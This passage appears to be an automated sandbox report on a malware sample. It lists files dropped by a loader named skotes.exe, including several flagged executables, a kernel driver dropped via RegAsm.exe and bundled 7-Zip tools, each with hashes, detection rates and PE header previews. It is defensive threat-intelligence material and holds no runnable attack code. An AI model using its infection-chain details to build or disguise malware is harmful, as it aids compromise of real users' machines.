                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1846272
                                                                                                                                                                                              Entropy (8bit):7.9480881259604015
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:49152:JympTOL59a2lQm9QRelFA+OwRhpzmC7RVpAgaXO:JympSV9zldYwA+OwRhpzjfAg
                                                                                                                                                                                              MD5:2A6AEEC4E777F7A51D69C8E2722470B0
                                                                                                                                                                                              SHA1:920239D60B2E721D26A25FD9CF5D5B7BB24FB071
                                                                                                                                                                                              SHA-256:9EE9269AF52C94E8DEBC491BE4FAE9FE7DF1A25BBC055895B57A18D80184EF00
                                                                                                                                                                                              SHA-512:BF568319C04750E6C481FBA348E72D815B968A215A8F281429237B0BB7E35B272F2D990AD1AF23731A8301DBF709EFD30CBEAC9532B4804710ABADAE89705DE1
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@..........................0I...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......\..............@... ..*..@.......^..............@...yoxsliso.....@/......`..............@...cztlhsvn......H.....................@....taggant.0....I.."..................@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\1015827001\eb571902cc.exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1836544
                                                                                                                                                                                              Entropy (8bit):7.9467633782755005
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24576:MKB1x6gJvw5Ksk6i4Twa1+tkQaoKMBkCOQ4T7F1dgbg9vzatkfBid8Ci:JB1j4dkO2aoTB5OFw2id1i
                                                                                                                                                                                              MD5:2B42A6845CEBBDB99B482BB1368550A9
                                                                                                                                                                                              SHA1:A77C1869DCF86FCB2599103F0BBA1F8A37D4F524
                                                                                                                                                                                              SHA-256:3047C85EFBA5F953D7308CD6CE571369962417B1F094B8C3129BAE3139503D3A
                                                                                                                                                                                              SHA-512:03DE82140E61B1260C47136BDC3E1EF7F1A81F09B7AD9AE13D90A2C229E1285287D9B878C27879CDE2A5667D39B0E48C166450F4473954040784EFD93C0D1459
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................*........j...........@...........................j.....N.....@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... .`+...$......|..............@...skauaiwm.p... P..b...~..............@...npkvhzbc......j.....................@....taggant.0....j.."..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\1015828001\cf4367ad3a.exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):967168
                                                                                                                                                                                              Entropy (8bit):6.696371968611622
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24576:08qDEvCTbMWu7rQYlBQcBiT6rprG8av4V:08TvC/MTQYxsWR7av
                                                                                                                                                                                              MD5:20ABE18170F17F6897254E2255CF871E
                                                                                                                                                                                              SHA1:4E267654F4CCB3755191C05AA0A1D3BC591F3B18
                                                                                                                                                                                              SHA-256:C9B2BBD6B1F057D79CE0E749CDED19D9D47CF281305F812E3D255FFC30C5FD8E
                                                                                                                                                                                              SHA-512:D1DBBA3ECAAEF71012CD07035EEE03B7F9827F823967C733CACE9FBD67C7DF7A5777B339F8640DCF36CF91C04164F31AB9BF9F85AC52C8C72D3AD0DA190CA1CC
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...dl_g..........".................w.............@.......................... ......Zo....@...@.......@.....................d...|....@...V.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....V...@...X..................@..@.reloc...u.......v...L..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\1015829001\8d37f89c6f.exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2779136
                                                                                                                                                                                              Entropy (8bit):6.49041762442888
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:49152:QpN/OtkkfJImH0PXdsLSRyqj6x6B8MusykUd0zttQ:A/rkfJImH0lsu0m6xtCL
                                                                                                                                                                                              MD5:9DFCB4A9EA102AF900DDDFB6A9254E7F
                                                                                                                                                                                              SHA1:7CE43CA00B6FB2D8D184A0FC4A2BD761EAFBFD12
                                                                                                                                                                                              SHA-256:AF3B4408B3FE6467351B49EA5328D12D75C09CC29B5E10B5448A682367FA7A5F
                                                                                                                                                                                              SHA-512:F257C8884DBAC1D0D1D3CE75FEEA8A4138E0E0C02B06412189D3BB245AE319460295FF8BC51C938D5E9FA6FCCB5533D48FC0AAB191EEFF8629427A1413536614
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............*.. ...`....@.. ....................... +......g+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...nprvplua. *.......*..:..............@...btyxknlq. ....*......B*.............@....taggant.@....*.."...F*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\1015830001\d0e065d272.exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1834496
                                                                                                                                                                                              Entropy (8bit):7.947620086095118
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:49152:05+SKvXhag1L9rYoMaf3nHwKUXBKTgEdjVS1:y+SKvh11VYoMafg1BSpVS1
                                                                                                                                                                                              MD5:6C1D0DABE1EC5E928F27B3223F25C26B
                                                                                                                                                                                              SHA1:E25AB704A6E9B3E4C30A6C1F7043598A13856AD9
                                                                                                                                                                                              SHA-256:92228A0012605351CF08DF9A2AD4B93FA552D7A75991F81FB80F1AE854A0E57D
                                                                                                                                                                                              SHA-512:3A3F7AF4F6018FCBD8C6F2871270504731CF269134453C9A146351C3E4A5C89165ECCCAFB3655D8B39C1FF1EC68F06E1851C0ABD66D47602E1F0F8E36D4ACFE9
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...b.Yg..............................H...........@...........................H..........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..)..@.......\..............@...ubvmxkob.........z...^..............@...xdawalmh.....pH.....................@....taggant.0....H.."..................@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\1015831001\f5e7dd5dbb.exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4438776
                                                                                                                                                                                              Entropy (8bit):7.99505709582503
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                              MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                              SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                              SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                              SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\1015832001\8fabf18f8e.exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):727552
                                                                                                                                                                                              Entropy (8bit):7.888061454157426
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:tyNudyx57oPuBlhyyZzWDtkfDdEIHiyO+rBlhyyZzWDtkfDdEIHiyO+N:t+3x5s2BCyqXIdXBCyqXId5
                                                                                                                                                                                              MD5:28E568616A7B792CAC1726DEB77D9039
                                                                                                                                                                                              SHA1:39890A418FB391B823ED5084533E2E24DFF021E1
                                                                                                                                                                                              SHA-256:9597798F7789ADC29FBE97707B1BD8CA913C4D5861B0AD4FDD6B913AF7C7A8E2
                                                                                                                                                                                              SHA-512:85048799E6D2756F1D6AF77F34E6A1F454C48F2F43042927845931B7ECFF2E5DE45F864627A3D4AA061252401225BBB6C2CAA8532320CCBE401E97C9C79AC8E5
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....$Xg.................N..........,6............@..........................P......|z....@.................................l...d...................................................................8h..............4...d............................text...AM.......N.................. ..`.rdata..<~...`.......V..............@..@.data...L...........................@....rsrc...............................@..@.reloc..............................@..B.bss.........0......................@....bss................................@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fa231h5.t3u.ps1

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ejuthox.1sp.psm1

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3jo11cm.anb.ps1

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjb0zbjo.azu.psm1

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ietsys4f.12r.psm1

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4aaiygi.uuo.ps1

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):3026432
                                                                                                                                                                                              Entropy (8bit):6.580370328881055
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:49152:l+OrfMejZNr/UFhowlQSEzzRQA1BehabYJOnbj:lrfdj8FhowlQSuziAOhaaOn3
                                                                                                                                                                                              MD5:D2B1682105389A925387227C660ABB87
                                                                                                                                                                                              SHA1:9C91CBBA1071420B73CAAD3A2ABCFC47360F4F0E
                                                                                                                                                                                              SHA-256:65E38A7DD78629BC9A810A0DAC0A18F977BE82EACD6DE5A090C0405C57DE7A26
                                                                                                                                                                                              SHA-512:452A20EDC68A8D76018220FE6F0ED3A38D6211E66B393F573F460FB2F9EC6F11EFB4B8A45256AD8C3CAE4ACC0CF31AE60C4BBC3692F967A34A350FB4E0C080BE
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................2.....[.....@.................................W...k.......D...................`.1...............................1..................................................... . ............................@....rsrc...D...........................@....idata ............................@...ptiuyvxt. +.......+.................@...izyqsoku......1.....................@....taggant.0....1.."..................@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:modified
                                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\lkpwsyczzfuj.sys

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):14544
                                                                                                                                                                                              Entropy (8bit):6.2660301556221185
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                                              MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                                              SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                                              SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                                              SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\7z.dll

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe
                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1679360
                                                                                                                                                                                              Entropy (8bit):6.278252955513617
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                                                              MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                              SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                              SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                              SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\7z.exe

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe
                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):468992
                                                                                                                                                                                              Entropy (8bit):6.157743912672224
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                                                                              MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                              SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                                              SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                                              SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\main\KillDuplicate.cmd

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):222
                                                                                                                                                                                              Entropy (8bit):4.855194602218789
                                                                                                                                                                                              Encrypted:false
